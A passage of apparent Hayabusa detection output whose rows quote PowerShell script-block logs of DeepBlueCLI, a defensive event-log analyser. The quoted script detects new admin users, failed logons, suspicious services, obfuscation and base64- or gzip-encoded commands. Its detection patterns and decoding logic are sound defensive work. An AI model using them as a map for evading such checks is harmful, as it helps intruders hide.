.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Obfu $pscommand) $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Obfu $commandline) $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if 
($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:11:27.669 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"$maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" 
} Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. 
Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded 
function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:11:27.669 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. 
Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded 
function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:11:27.669 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:11:27.672 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Obfu $pscommand) $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Obfu $commandline) $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if 
($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:11:27.682 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { 